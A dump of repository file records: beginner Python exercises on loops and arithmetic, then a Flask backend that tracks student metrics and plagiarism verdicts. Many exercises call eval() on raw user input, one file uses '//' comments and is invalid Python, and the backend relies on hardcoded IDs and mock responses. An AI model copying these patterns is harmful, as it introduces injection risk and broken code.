"text": "# Generating a random integer between 1 and 10 inclusively.\nfrom random import randint\nx = randint(1,10)\nprint('A random number between 1 and 10: ', x)\nprint()\n\n# The following methods do not require importing the math module.\nprint(abs(-4.3))\nprint(round(3.336, 2))\nprint(round(345.2, -1))\n\n# Trigonometry Functions\nfrom math import sin, pi\nprint('Pi is roughly', pi)\nprint('sin(90) =', sin(90))\n\n\n# Getting help on the math module type the following lines.\nimport math\ndir(math)\n# To Get Help On A Specific Method Type The Following.\nhelp(math.pow)\n\nfrom math import* # Imports everything from the math module.\n"
},
{
"alpha_fraction": 0.52173912525177,
"alphanum_fraction": 0.6086956262588501,
"avg_line_length": 22,
"blob_id": "7df94f4269bfe9c90701f2a0a63a50f2ff4d93f0",
"content_id": "5173b24b95158f942c5efa42d584646fba4c4b5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_2b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for j in range(50):\n print('Lwandile '*18)\n"
},
{
"alpha_fraction": 0.5978260636329651,
"alphanum_fraction": 0.6195651888847351,
"avg_line_length": 22,
"blob_id": "56d833ccd6a53208ebe96f4b91959865977bd1d5",
"content_id": "77c807b164e4f585e18bd1e7d1281905b064b5e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 92,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 4,
"path": "/For Loops/Exercises/Exercise_2_5_13a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "rows = eval(input('Enter number of rows : '))\n\nfor row in range(rows,0,-1):\n\tprint('*'*row)\n"
},
{
"alpha_fraction": 0.7727272510528564,
"alphanum_fraction": 0.7863636612892151,
"avg_line_length": 54,
"blob_id": "36757a6e815e0060fd7d29c2149ee6c1517a9776",
"content_id": "e6c4ae011f7147434e1d154b112c63a8bef492b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 4,
"path": "/Basics/Exercises/Exercise_1_8_7c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "weightInKilograms = eval(input('Enter weight : '))\nweightInPounds = weightInKilograms*2.2\nprint('Without Rounding Of',weightInPounds)\nprint('There are',round(weightInPounds,2),'pounds in',weightInKilograms,'kilograms.')\n"
},
{
"alpha_fraction": 0.5822580456733704,
"alphanum_fraction": 0.6403225660324097,
"avg_line_length": 21.178571701049805,
"blob_id": "de9e071f52bf6e007275ba8b8f23334fb857582f",
"content_id": "47d0df97dd9b54b1b1b45d267a464a6f4284fc55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 620,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 28,
"path": "/For Loops/For_Loops.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "// Print Hello Ten Times.\nfor i in range(10):\n\tprint('Hello')\n\t\n// Retrieve User Input Ten Times.\nfor i in range(3):\n\tnum = eval(input('Enter a number: '))\n\tprint ('The square of your number is', num*num)\nprint('The loop is now done.')\n\n// The Sum Of The First Ten Numbers.\nsum = 0\nfor index in range(10):\n\tsum += index\nprint(sum)\n\n// Playing with the range function.\nfor index in range(5,11):\n\tprint(index,end='',sep=' ')\nprint()\n// Print numbers from 10 to 100 (10, 20, 30,...)\nfor i in range(10,110,10):\n\tprint(i,end=' ')\nprint()\n// Print numbers from 10, 8, 7,...0\nfor i in range(10,-2,-2):\n\tprint(i,end=' ')\nprint()"
},
{
"alpha_fraction": 0.6511628031730652,
"alphanum_fraction": 0.6511628031730652,
"avg_line_length": 20.5,
"blob_id": "5ab711919eb78d3e6428f23401d0ab089a968a02",
"content_id": "c38f4d9bda69c05fdb2d24130760a0677271d620",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 6,
"path": "/Numbers/Exercises/Exercise_3_8_6b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "x = eval(input('Enter x : '))\ny = eval(input('Enter y : '))\n\nnumerator = abs(x-y)\ndenominator = x+y\nprint(numerator/denominator)\n"
},
{
"alpha_fraction": 0.7421875,
"alphanum_fraction": 0.7578125,
"avg_line_length": 63.5,
"blob_id": "b1a5c066900f075b57339f5947cad2e731b264be",
"content_id": "7bdec9b3865ae349ace7c5a52f1d534493698140",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 128,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 2,
"path": "/Basics/Exercises/Exercise_1_8_7b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "weightInKilograms = eval(input('Enter weight : ')) \nprint('There are',weightInKilograms*2.2,'in',weightInKilograms,'kilograms.')"
},
{
"alpha_fraction": 0.5213675498962402,
"alphanum_fraction": 0.5641025900840759,
"avg_line_length": 18.5,
"blob_id": "1be5f3d3009e088c4c126bf675661d853bc5f7ee",
"content_id": "961b424048e2b2709992becdc1a2ea8c556ab769",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 6,
"path": "/Numbers/Exercises/Exercise_3_8_2b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "from random import randint\nx = randint(1,50)\ny = randint(2,5)\n\nprint('x = ',x,'\\ty = ',y,sep='')\nprint('x^y =',x**y)\n"
},
{
"alpha_fraction": 0.72052401304245,
"alphanum_fraction": 0.7336244583129883,
"avg_line_length": 37.33333206176758,
"blob_id": "17a26491cff2b6280ea62bc110822b427fee582b",
"content_id": "a8fd0585764422de4ece9d98de3c38992eed7b56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 229,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 6,
"path": "/Basics/Exercises/Exercise_1_8_9a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "mealPrice = eval(input('Enter Meal Price : '))\ntipPercent = eval(input('Enter Tip Percent : '))\n\ntipAmount = (tipPercent/100)*mealPrice\ntotalPrice = mealPrice + tipAmount\nprint('Final Price =',totalPrice,'Tip Amount =',tipAmount)"
},
{
"alpha_fraction": 0.772455096244812,
"alphanum_fraction": 0.7844311594963074,
"avg_line_length": 54.66666793823242,
"blob_id": "e49f56fcb68df2a0b949e8eb8f857e409ad28aa4",
"content_id": "1c42b9ed7487ad4e001bbf4616a957f1c79968b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 3,
"path": "/Basics/Exercises/Exercise_1_8_7a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "weightInKilograms = eval(input('Enter weight : '))\nweightInPounds = weightInKilograms*2.2\nprint('There are',weightInPounds,'pounds in',weightInKilograms,'kilograms.')\n"
},
{
"alpha_fraction": 0.5178571343421936,
"alphanum_fraction": 0.5892857313156128,
"avg_line_length": 18,
"blob_id": "1631b8c39d8c1124f2fb952da0521fa124f5df64",
"content_id": "3cebc239b878a8e873d87bb80651cab40a0db76e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 56,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 3,
"path": "/For Loops/Exercises/Exercise_2_5_3a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "name = 'Lwandile Ganyile'\nfor i in range(100):\n\tprint((i+1), name)"
},
{
"alpha_fraction": 0.5925925970077515,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 17.33333396911621,
"blob_id": "ac82bb7707b09ce8c0ccdf6d67364773d1982259",
"content_id": "70de136c80e5c51c357df809ff10d587d43eb304",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 54,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 3,
"path": "/For Loops/Exercises/Exercise_2_5_1b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "name = 'Lwandile '\nfor i in range(10):\n\tprint(name*10)"
},
{
"alpha_fraction": 0.7081339955329895,
"alphanum_fraction": 0.7129186391830444,
"avg_line_length": 25.25,
"blob_id": "eb2035a39b8472760f8fc4cff39195c3607460c1",
"content_id": "800033aad35a3ad81b2c43ef4b5a051de8f6e6cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 8,
"path": "/For Loops/Exercises/Exercise_2_5_8c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "username = input('Enter Your Name : ')\nnumberOfTimes = eval(input('Enter number of times : '))\n\nif numberOfTimes>0:\n\tfor i in range(numberOfTimes):\n\t\tprint(username)\nelse:\n\tprint('Error : Invalid User Input.')"
},
{
"alpha_fraction": 0.5512820482254028,
"alphanum_fraction": 0.6025640964508057,
"avg_line_length": 18.5,
"blob_id": "57af59a4246ff848a45f45df66f3abca949599ef",
"content_id": "2e98e740e1966f7b147f3825c9d9c6911b89f2d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 78,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 4,
"path": "/For Loops/Exercises/Exercise_2_5_2c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(50):\n\tfor j in range(18):\n\t\tprint('Lwandile',end=' ')\n\tprint()\n"
},
{
"alpha_fraction": 0.6646341681480408,
"alphanum_fraction": 0.6829268336296082,
"avg_line_length": 22.428571701049805,
"blob_id": "0cf6dc2e8a8709a605c5e79e96f49b7be63fb793",
"content_id": "28aea8edf4098f35cea0e954a5c2230ba324b1ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 7,
"path": "/Numbers/Exercises/Exercise_3_8_10ab.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "exponent = eval(input('Enter power : '))\nanswer = pow(2,exponent)\ndigit = answer%10\n\nprint('Power =',exponent)\nprint('Number =',answer)\nprint('Last Digit =',digit)\n"
},
{
"alpha_fraction": 0.4583333432674408,
"alphanum_fraction": 0.5208333134651184,
"avg_line_length": 23.5,
"blob_id": "199d68b0897684907bff94d4e3dd3f443f193771",
"content_id": "dbceb74b4ebb582434d2ec47cd317e5712cf3c18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_4b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(1,21):\n\tprint(i, i*i,sep=' --- ')"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 22.66666603088379,
"blob_id": "c8eb6ca25a91e1e2b93d19e56f14a461d85b3c11",
"content_id": "94179d5138b45e2ea9883d312e2cf0fdfb0fbcff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 3,
"path": "/Basics/Exercises/Exercise_1_8_4a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "numerator = 512-282\ndenominator = 47*48+5\nprint(numerator/denominator)"
},
{
"alpha_fraction": 0.649402379989624,
"alphanum_fraction": 0.6693227291107178,
"avg_line_length": 26.88888931274414,
"blob_id": "bb7afa84a8bda0a35551ee97b5e74c75ce8c49e5",
"content_id": "8c05079dd140244ee348cd457b10095a75bb9fcc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 9,
"path": "/Numbers/Exercises/Exercise_3_8_8c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "totalTime = eval(input('Enter number of seconds : '))\nif totalTime>0:\n minutes = totalTime//60\n seconds = totalTime%60\n\n print(minutes,'minute(s)')\n print(seconds,'second(s)',)\nelse:\n print(totalTime,'is an invalid number of seconds.')\n"
},
{
"alpha_fraction": 0.624365508556366,
"alphanum_fraction": 0.6446700692176819,
"avg_line_length": 38.400001525878906,
"blob_id": "05c77cb31693514052fdf14279e194dad60f192a",
"content_id": "b3dc2f579ac59bee5491294b942070aa1b8b9f60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 5,
"path": "/For Loops/Exercises/Exercise_2_5_4c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "# Imagine we wanted to to display a --- a^n, where n is an real numbers.\n# Ofcouse a*a*a*a*a*...*a would be tedious and combusome.\nimport math\nfor i in range(1,21):\n\tprint(i, pow(i,2),sep=' --- ')\n"
},
{
"alpha_fraction": 0.5405405163764954,
"alphanum_fraction": 0.6216216087341309,
"avg_line_length": 18,
"blob_id": "f0894cf3ff9236f64133344b55a60f4c91886986",
"content_id": "08e186550fed395af5d725371e94a1d9b4e613ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 37,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_1a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(100):\n\tprint('Lwandile Ganyile')"
},
{
"alpha_fraction": 0.7111913561820984,
"alphanum_fraction": 0.7220216393470764,
"avg_line_length": 33.625,
"blob_id": "69208c67711c0f3fbd97ef6c57f3c2139238375b",
"content_id": "7c9e49a39859b1173924d018391e0aecb340dc59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 8,
"path": "/Numbers/Exercises/Exercise_3_8_10ca.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "power = eval(input('Enter power : '))\nnumber = 2**power\nnumberOfLastDigits = eval(input('Enter number of last digits : '))\n\nlastDigits = number%(pow(10,numberOfLastDigits))\nprint('Power =',power)\nprint('Number =',number)\nprint('Last',numberOfLastDigits,'digit(s)' ,lastDigits)\n"
}
] | 35 |
evigore/BehaviorWatcher
|
https://github.com/evigore/BehaviorWatcher
|
b5a06ac4b3143f18c1f972e75f3f9f614bebeddc
|
5ec45688d58f57c2b9e23dab82db0b5c694d0b40
|
65a19bca3150ef6348e2209ecf8a71b9fa852bda
|
refs/heads/main
| 2023-08-02T06:25:59.901214 | 2021-10-02T15:40:47 | 2021-10-02T15:40:47 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7379310131072998,
"alphanum_fraction": 0.7379310131072998,
"avg_line_length": 25.363636016845703,
"blob_id": "150d80cbd6b69d51d50b391a20fe5524b8f9751f",
"content_id": "ef73dfe179bac3bad1c65c5f3766f7b11c150b22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 22,
"path": "/backend/server.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "import os\nimport connexion\nimport thirdparty\n\nconnex_app = connexion.FlaskApp(__name__, specification_dir='./')\napp = connex_app.app\n\n# Configure the SqlAlchemy part of the app instance\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = 'sqlite:///behaviorWatcher.db'\napp.config[\"SQLALCHEMY_ECHO\"] = True\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n\nthirdparty.db.init_app(app)\nthirdparty.ma.init_app(app)\n\nconnex_app.add_api('./swagger.yaml')\n\nwith app.app_context():\n if not os.path.exists(\"behaviorWatcher.db\"):\n thirdparty.db.create_all()\n\nconnex_app.run(debug=False)\n"
},
{
"alpha_fraction": 0.6434599161148071,
"alphanum_fraction": 0.6455696225166321,
"avg_line_length": 25.33333396911621,
"blob_id": "f59c341caf0bf5bee4a27e94a7aa34d78f8032c7",
"content_id": "5c139498ef4db1127dc515dcf5efa1e17919de03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 18,
"path": "/backend/thirdparty/__init__.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "from flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nfrom datetime import datetime\n\ndb = SQLAlchemy()\nma = Marshmallow()\n\ndef fetch(result):\n tmp = []\n\n for i in result:\n solution = {key: value for key, value in i.items()}\n if 'CreatedAt' in solution:\n solution['CreatedAt'] = datetime.strptime(solution['CreatedAt'].split('.')[0], '%Y-%m-%d %H:%M:%S') # TODO: remove\n\n tmp.append(solution)\n\n return tmp\n"
},
{
"alpha_fraction": 0.6109631657600403,
"alphanum_fraction": 0.6240568161010742,
"avg_line_length": 29.863014221191406,
"blob_id": "72c414d0419da4ca841958d56b177ac43f9b496f",
"content_id": "496f7e7283af1bde13237a4b0e29051f70e0cb84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4506,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 146,
"path": "/backend/metrics_controller.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "\"\"\"\nHTTP handlers for /metrics route\n\"\"\"\n\nfrom thirdparty import db\nfrom models import (\n Error,\n ErrorSchema,\n Metric,\n MetricSchema,\n)\n\nerrorSchema = ErrorSchema()\nmetricSchema = MetricSchema()\nmetricsSchema = MetricSchema(many=True)\n\n\ndef get(user_id=None, task_id=None):\n \"\"\"\n Respond to a GET request for /api/metrics\n\n :return json array of metrics\n \"\"\"\n try:\n if user_id is None and task_id is None:\n metrics = Metric.query.all()\n return metricsSchema.dump(metrics), 200\n\n if user_id is None:\n metrics = Metric.query.filter(Metric.task_id == task_id).all()\n return metricsSchema.dump(metrics), 200\n\n if task_id is None:\n metrics = Metric.query.filter(Metric.user_id == user_id).all()\n return metricsSchema.dump(metrics), 200\n\n metrics = Metric.query.filter(Metric.user_id.like(user_id) & Metric.task_id.like(task_id)).all()\n return metricsSchema.dump(metrics), 200\n except Exception as e:\n print(e)\n return errorSchema.dump(Error('Unexpected error')), 500\n\n\ndef post(body):\n \"\"\"\n Respond to a POST request for /api/metrics\n Creates new metric with metric data, assigns metric.id\n \"\"\"\n\n try:\n result = Metric.query.filter(\n Metric.user_id.like(body.get('user_id')) & Metric.task_id.like(body.get('task_id'))).one_or_none()\n if result is not None:\n return patch(result.id, body)\n # return errorSchema.dump(Error(f\"Metric with user_id={Body['user_id']} and task_id={Body['task_id']} already exists.\")), 400\n\n metric = Metric(**body)\n db.session.add(metric)\n db.session.commit()\n\n return get_one(metric.id)[0]\n except TypeError as e:\n return errorSchema.dump(Error(str(e))), 400\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef get_one(metric_id):\n \"\"\"\n Respond to a GET request for /api/metrics/{metricId}\n Returns specified metric\n\n :param metric_id Id of the metric to read\n :return metric on success or 404\n \"\"\"\n\n try:\n metric = Metric.query.filter(Metric.id.like(metric_id)).one_or_none()\n if metric is None:\n return errorSchema.dump(Error(f\"Metric with metricId={metric_id} does not exists\")), 400\n\n return metricSchema.dump(metric), 200\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef patch(metric_id, body):\n \"\"\"\n Respond to a PATCH request for /api/metrics/{metricId}\n Patches the metric with the properties of Body or leaves unchanged\n\n :param metric_id Id of the metric to update\n :param body\t\t Data to update the metric with\n \"\"\"\n\n try:\n metric = Metric.query.filter(Metric.id.like(metric_id)).one_or_none()\n if metric is None:\n return errorSchema.dump(Error(f\"Metric with metricId: {metric_id} does not exists\")), 400\n\n metric.user_id = body.get('user_id')\n metric.task_id = body.get('task_id')\n\n if body.get('reading_time') is not None:\n metric.reading_time += max(0, int(body.get('reading_time')))\n\n if body.get('task_viewed') is not None:\n metric.task_viewed = metric.task_viewed or bool(body.get('task_viewed'))\n\n if body.get('task_copied') is not None:\n metric.task_copied = metric.task_copied or bool(body.get('task_copied'))\n\n db.session.add(metric)\n db.session.commit()\n\n return metricSchema.dump(metric), 200\n except db.exc.IntegrityError:\n return errorSchema.dump(\n Error(f\"Metric with user_id={metric.user_id} and task_id={metric.task_id} already exists\")), 400\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef delete(metric_id):\n \"\"\"\n Respond to a DELETE request for /api/metrics/{metricId}\n Deletes the metric\n\n :param metric_id Id of the metric to update\n \"\"\"\n\n try:\n metric = Metric.query.filter(Metric.id.like(metric_id)).one_or_none()\n if metric is None:\n return errorSchema.dump(Error(f\"Metric with id {metric_id} not found\")), 400\n\n db.session.delete(metric)\n db.session.commit()\n\n return errorSchema.dump(Error(\"OK\")), 200\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n"
},
{
"alpha_fraction": 0.5194312930107117,
"alphanum_fraction": 0.5930941104888916,
"avg_line_length": 36.67856979370117,
"blob_id": "e07ecdec5a4ce47426e27a83b9a8335a45b613cb",
"content_id": "a563d5de64db91f79fae460ac951a7d3f2b3f51a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7525,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 196,
"path": "/backend/verifications_controller.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "\"\"\"\nHTTP handlers for /verification route\n\"\"\"\nimport json\nimport filter\nimport metrics\n\nfrom flask import jsonify\nfrom thirdparty import db, fetch\nfrom models import (Metric, Verification, Error, VerificationSchema, ErrorSchema)\n\nerrorSchema = ErrorSchema()\nverificationSchema = VerificationSchema()\n\napiResponse = \"\"\"{\n \"Version\": \"1\",\n \"SolutionID\": \"original.py\",\n \"MaxSimilarity\": 0.9806427276796765,\n \"MaxSimilaritySolutionID\": \"different_comments.py\",\n \"Verdict\": \"CLEAR POSITIVE\",\n \"Scores\": [\n {\n \"SolutionID\": \"different_comments.py\",\n \"TotalScore\": 0.9806427276796765,\n \"TextBasedScore\": 1,\n \"TokenBasedScore\": 0.9955476522445679,\n \"MetricBasedScore\": 0.9444444444444444,\n \"BinaryBasedScore\": 0.9825788140296936,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"reformatted.py\",\n \"TotalScore\": 0.971757612294621,\n \"TextBasedScore\": 0.9889094233512878,\n \"TokenBasedScore\": 0.9714533090591431,\n \"MetricBasedScore\": 0.9444444444444444,\n \"BinaryBasedScore\": 0.9822232723236084,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"renamed_variables.py\",\n \"TotalScore\": 0.9180482551455498,\n \"TextBasedScore\": 0.7295423150062561,\n \"TokenBasedScore\": 1,\n \"MetricBasedScore\": 1,\n \"BinaryBasedScore\": 0.942650705575943,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"reordered.py\",\n \"TotalScore\": 0.9036459699273109,\n \"TextBasedScore\": 0.8485981523990631,\n \"TokenBasedScore\": 0.9040516316890717,\n \"MetricBasedScore\": 1,\n \"BinaryBasedScore\": 0.861934095621109,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"with_additional_imports.py\",\n \"TotalScore\": 0.8646872325075997,\n \"TextBasedScore\": 0.8857616186141968,\n \"TokenBasedScore\": 0.9573742747306824,\n \"MetricBasedScore\": 0.8888888888888888,\n \"BinaryBasedScore\": 0.7267241477966309,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"with_functions.py\",\n \"TotalScore\": 0.5494582574400637,\n \"TextBasedScore\": 0.4490084946155548,\n \"TokenBasedScore\": 0.679684579372406,\n \"MetricBasedScore\": 0.7222222222222222,\n \"BinaryBasedScore\": 0.3469177335500717,\n \"TreeBasedScore\": null\n }\n ]\n}\"\"\"\n\n\ndef get_one(solution_id):\n try:\n # get user id and task id\n verification = Verification.query.filter(\n Verification.destination_solution_id.like(solution_id) & Verification.verdict_of_human.is_(True)).first()\n user_id = None\n task_id = None\n if verification is not None:\n user_id = verification.destination_user_id\n task_id = verification.task_id\n\n # get user rating\n rating = metrics.get_user_rating(user_id) if verification else None\n\n # get task_copied, task_viewed and reading_time\n metric = Metric.query.filter(Metric.user_id.like(user_id) & Metric.task_id.like(task_id)).one_or_none()\n reading_time = metric.reading_time\n task_copied = False\n task_viewed = False\n if metric:\n task_copied = metric.task_viewed\n task_viewed = metric.task_copied\n\n # time reading + number of attempts\n solutions = fetch(db.engine.execute(\n \"SELECT OwnerId, COUNT(OwnerId) AS attempts FROM Solution WHERE TestTaskId='ff1636d5-0aab-479c-9aa2-b14271d8cdf2' GROUP BY OwnerId ORDER BY attempts\",\n {\n # 'task_id': target_solution['TestTaskId'] # TODO: change to real task id\n }))\n user_id = 'e7c8a6c6-b73c-4179-8cb0-45bfcfea9ca5' # TODO: delete\n average_attempts = 0\n user_attempts = 0\n for solution in solutions:\n average_attempts += solution['attempts']\n if solution['OwnerId'] == user_id:\n user_attempts = solution['attempts']\n average_attempts /= len(solutions)\n\n time_and_attempts = ''\n if reading_time < 3:\n time_and_attempts = 'Пользователь не читал задание'\n elif user_attempts < average_attempts:\n time_and_attempts = 'Пользователь решил задание за меньше среднего количества попыток'\n elif user_attempts >= average_attempts:\n time_and_attempts = 'Пользователь решил задание за больше среднего количества попыток'\n\n # order of solution\n # solutions = fetch(db.engine.execute(\"SELECT OwnerId, CreatedAt FROM Solution WHERE TestTaskId='ff1636d5-0aab-479c-9aa2-b14271d8cdf2' AND FailedTest IS NULL GROUP BY OwnerId\", {\n ##'task_id': target_solution['TestTaskId'] # TODO: change to real task id\n # }))\n # solutions.sort(reverse=True, key=lambda i: i['CreatedAt'])\n # print(solutions[0], solutions[1])\n\n report = {\n 'rating': rating,\n 'task_viewed': task_viewed,\n 'task_copied': task_copied,\n 'time_and_attempts': time_and_attempts\n }\n\n return jsonify(report), 200\n except Exception as e:\n print(str(e))\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef post(solution_id):\n try:\n # 1. Get solution entity with userId, task, etc from other DB\n solution_id = 1\n\n # 2. filter users (filter.py)\n filter(solution_id)\n\n # 3. call API of other module\n response = json.loads(apiResponse) # apiResponse = request(...) # TODO: real request\n\n for i in response['Scores']:\n verification = Verification(**{\n 'source_solution_id': i['SolutionID'],\n 'destination_solution_id': solution_id,\n 'source_user_id': 4, # TODO: change to real id\n 'destination_user_id': 6, # TODO: change to real id\n 'task_id': 59, # TODO: change to real id\n 'verdict_of_module': response['Verdict'],\n 'total_score': i['TotalScore'],\n 'text_based_score': i['TextBasedScore'],\n 'token_based_score': i['TokenBasedScore'],\n 'metric_based_score': i['MetricBasedScore'],\n 'binary_based_score': i['BinaryBasedScore'],\n 'tree_based_score': i['TreeBasedScore']\n })\n\n db.session.add(verification)\n\n # 4. save result to our DB (especially to Verification TABLE)\n db.session.commit()\n\n return errorSchema.dump(Error(\"OK\")), 200\n except Exception as e:\n print(str(e)) # TODO: delete\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef patch(solution_id, body):\n try:\n if body.get('is_plagiarism'):\n Verification.query.filter(Verification.destination_solution_id == solution_id).update(\n {Verification.verdict_of_human: True})\n else:\n Verification.query.filter(Verification.destination_solution_id == solution_id).delete()\n\n db.session.commit()\n return errorSchema.dump(Error(\"OK\")), 200\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n"
},
{
"alpha_fraction": 0.6980661153793335,
"alphanum_fraction": 0.7045539617538452,
"avg_line_length": 27.727598190307617,
"blob_id": "73f39ff289480c76519215e390d5ad313f7921b5",
"content_id": "39172b65e5a734b1901562746aae223264e56c2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 8015,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 279,
"path": "/frontend/js/watcher_with_pages.js",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
